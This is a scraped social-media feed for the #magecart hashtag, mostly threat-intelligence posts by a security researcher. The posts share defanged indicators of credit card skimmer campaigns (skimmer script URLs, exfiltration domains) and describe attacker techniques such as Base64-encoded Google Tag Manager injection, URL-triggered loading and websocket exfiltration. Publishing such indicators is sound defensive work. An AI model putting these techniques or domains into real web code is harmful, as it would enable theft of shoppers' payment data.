Mr.Trunk · @mrtrunk
12 followers · 19378 posts · Server dromedary.seedoubleyou.me
Tarnkappe.info · @tarnkappeinfo
2168 followers · 4624 posts · Server social.tchncs.de
CK's Technology News · @CKsTechNews
1961 followers · 5770 posts · Server cktn.todon.de
Jérôme Segura · @malwareinfosec
737 followers · 133 posts · Server infosec.exchange

Added detection rules for new skimmer.

entrydelt[.]sbs/check[.]js
entrydelt[.]sbs/loader[.]min[.]js
flagmob[.]quest/id[.]min[.]js
flowit[.]pics/logg[.]min[.]js
prijetech[.]shop/ww[.]min[.]js
sanpatech[.]shop/techs[.]min[.]js
vitalmob[.]pics/pre-loader[.]js

github.com/malwareinfosec/EKFi

#ekfiddle #magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
730 followers · 128 posts · Server infosec.exchange

The campaign via ASN RU-JSCIOT is still ongoing.

You've got to give it to them for impersonating legitimate services like chat application Olark for example.

Skimmer code:
static[.]olark[.]org/mod/addons.js
Skimmer exfiltration:
static[.]olark[.]org/t/

More background information on this campaign here: malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
730 followers · 128 posts · Server infosec.exchange

A couple of new domains seen recently:

gtag-analytics[.]com
gogletags[.]click

One thing that caught my attention was code for the Cloudflare endpoint API. It looks like they are collecting IP addresses and user-agent strings for ulterior motives.

malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
627 followers · 83 posts · Server infosec.exchange

Website owners should secure their Google Tag Manager account and be on the lookout for injected code that would reference an additional GTM.

Several attacks I've looked at recently used a Google Tag Manager library to load credit card skimmers.

Here's an example and a couple of new domains:
webstatlstics[.]com (skimmer)
info-select[.]com (exfiltration)

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
624 followers · 79 posts · Server infosec.exchange

The breach of LCBO (Ontario’s Liquor Control Board) with a credit card skimmer was malicious code injected inside a Google Tag Manager snippet encoded as Base64.

It only loads the skimmer if the current URL contains the string 'checkou' (note the missing 't'). It then opens a websocket for communication which is more covert than a typical HTTP request.

The domain is: magento-cdn[.]net, which was registered less than a month ago.

You can view the code in its entirety on this urlscanio capture flagged by SanSec.io:
urlscan.io/result/9b1f4ca6-7a1

cc @serghei

#magecart

Last updated 2 years ago

CTIN · @ctin
120 followers · 187 posts · Server infosec.exchange
Here is the original analysis by MalwareBytes of the mr.SNIFFA framework for credit card skimming | #magecart | https://www.malwarebytes.com/blog/threat-intelligence/2023/01/crypto-inspired-magecart-skimmer-surfaces-via-digital-crime-haven

#magecart

Last updated 2 years ago

securityaffairs · @securityaffairs
320 followers · 211 posts · Server infosec.exchange
Jérôme Segura · @malwareinfosec
599 followers · 77 posts · Server infosec.exchange

I recently came across an interesting skimmer where the threat actor seemed to be a crypto fanboy.

It's actually using the mr.SNIFFA toolkit and the domains are hosted with Russian-based DDos-Guard.

Thanks to the folks at SilentPush and their service for a deeper look in the infrastructure. Also, to @briankrebs for the name check on the briansclub site selling stolen credit cards.

You can read more about it in this blog post:
malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
552 followers · 59 posts · Server infosec.exchange

Found a new skimmer

https[:]//vk-0y7l5hkf[.]ru/gate/jquery-static.js

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
552 followers · 59 posts · Server infosec.exchange

Following the exfiltration path for this credit card skimmer () led to an open directory loaded with stolen CC data.

The domain has now been suspended.

#magecart

Last updated 2 years ago

Mika Rautio · @mrautio
21 followers · 35 posts · Server infosec.exchange

"The Jscrambler research team uncovered a new technique that attackers are using to get more targets: getting control of defunct domains that formerly hosted popular JavaScript libraries."

blog.jscrambler.com/defcon-ski

#ecommerce #magecart #pcidss

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
485 followers · 51 posts · Server infosec.exchange

Google Tag Manager injected with skimmer

Container id: d=GTM-KC9DJLG

Exfiltration domain googletrackevent[.]com was already known.

There's a great report on this campaign here: go.recordedfuture.com/hubfs/re

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
348 followers · 36 posts · Server infosec.exchange

domain to watch out for
googleanalyticstag[.]com (currently does not resolve)

#magecart

Last updated 2 years ago

#AxisOfEasy · @axisofeasy
32 followers · 621 posts · Server nojack.easydns.ca
#AxisOfEasy · @axisofeasy
32 followers · 621 posts · Server nojack.easydns.ca
#AxisOfEasy · @axisofeasy
32 followers · 621 posts · Server nojack.easydns.ca